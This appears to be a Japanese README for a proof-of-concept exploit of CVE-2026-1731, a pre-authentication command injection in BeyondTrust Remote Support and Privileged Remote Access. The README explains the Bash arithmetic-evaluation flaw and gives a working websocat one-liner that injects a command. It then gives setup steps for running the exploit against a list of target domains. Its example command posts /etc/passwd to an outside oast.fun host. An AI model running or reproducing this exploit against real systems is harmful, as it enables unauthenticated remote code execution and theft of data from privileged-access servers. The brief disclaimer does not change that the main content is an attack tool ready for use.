
CVE-2026-1731 - WebSocket から到達可能なスクリプトにおける安全でない Bash 算術評価に起因する、BeyondTrust Remote Support および Privileged Remote Access の重大なコマンドインジェクションの脆弱性。
[!WARNING] このスクリプトは教育および研究目的のみを意図しています。明示的な許可なしにシステムに対して使用しないでください。不正アクセスやテストは違法かつ非倫理的です。このスクリプトを使用する前に完全な免責事項をお読みください。
このスクリプトは、BeyondTrust Remote Support (RS) および Privileged Remote Access (PRA) に影響する重大なコマンドインジェクションの脆弱性 (CVE-2026-1731) を実証します。この問題は、以前に注目された CVE-2024-12356 に関与した同じ WebSocket で到達可能なエンドポイントに由来しており、密接に関連する変種です。
この脆弱性は、サーバーの thin-scc-wrapper スクリプトが攻撃者が制御する入力に対して算術比較を実行することに起因します。具体的には、WebSocket ハンドシェイク中に送信される remoteVersion 値が対象です。Bash は数値比較のオペランドを単なる文字列ではなく式として扱うため、a[$(cmd)]0 のような細工されたペイロードが評価中に任意のコマンド実行を引き起こす可能性があります。
BeyondTrust が今回のパッチサイクルで数値の健全性チェックを追加したとしても、その後の Bash による式評価を防ぐことはできず、エンドポイントは悪用可能なままです。攻撃者は、認証前に WebSocket 接続を開いて悪意のあるバージョン値を送信するだけでコード実行を達成できます。
echo -ne "hax[\$(ATTACKER-COMMAND)]\naaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa\n0\naaaa\n" | \
./websocat -k wss://AFFECTED-SYSTEM:443/nw \
--protocol "ingredi support desk customer thin" \
-H "X-Ns-Company: COMPANY-NAME" \
--binary -n -
pip3 install requests
wget -O websocat https://github.com/vi/websocat/releases/download/v1.14.1/websocat.x86_64-unknown-linux-musl
chmod +x websocat
(Python スクリプトと同じフォルダに配置してください。)
またはシステム全体に移動します:
sudo mv websocat /usr/local/bin/
domains.txt を作成テストしたい URL を追加します:
example1.com
example2.com
example3.com
WebSocket エクスプロイトに実行させたいコマンドを設定するには、スクリプト内の次の行を編集します:
CMD = "YOUR-COMMAND-HERE"
例:
CMD = "curl -X POST -d @/etc/passwd http://XXXXXXXXX.oast.fun/"
コマンドを設定したら、スクリプトを実行します:
python3 exploit.py
または、実行可能にして直接実行します:
chmod +x exploit.py
./exploit.py